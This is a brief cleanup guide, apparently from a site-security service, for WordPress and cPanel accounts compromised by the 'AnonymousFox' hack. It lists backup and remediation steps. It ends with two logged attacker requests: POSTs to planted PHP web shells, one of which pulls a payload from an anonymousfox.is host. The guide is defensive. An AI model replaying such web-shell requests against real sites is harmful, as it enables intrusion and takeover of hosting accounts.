Last updated: December 13 2021
If your hosting account is being affected AnonymousFox, don’t blame your web host. Probably you’re using WordPress and attackers gained access using vulnerable scripts.
Here’s what you should do.
Need help? Let us clean your site.
- To prevent data loss, backup database using phpMyAdmin.
- Archive plugins, themes and uploads folders – place these in a safe area.
- Disable all your sites by moving files outside public area. Alternatively, you may rename “public_html” to “public_html_bk”.
Note: if any of these steps look like Japanese, probably you should hire someone to investigate and fix your website.
To address AnonymousFox hack, perform the following:
- Reset cPanel password.
- Removed unauthorized email accounts.
- Reset cPanel contact emails, checking “Contact Information” section.
- Make sure .contactemail file is right.
- Fix users entries, look for AnonymousFox and revert them.
- Perform a thorough malware cleanup for your website: https://guides.magefix.com/2021/03/fix-talkingaboutfirms-ga/
Need help? Try our Free security analysis.
220.127.116.11 – – [08/Dec/2021:19:57:48 +0100] “POST /wp-content/xydbtmlykd.php?php=anonymousfox.is/[email protected]/p2.txt HTTP/1.1” 200
18.104.22.168 – – [08/Dec/2021:19:57:34 +0100] “POST /wp-content/v1xn4.php?Fox=9ToZs HTTP/1.1” 200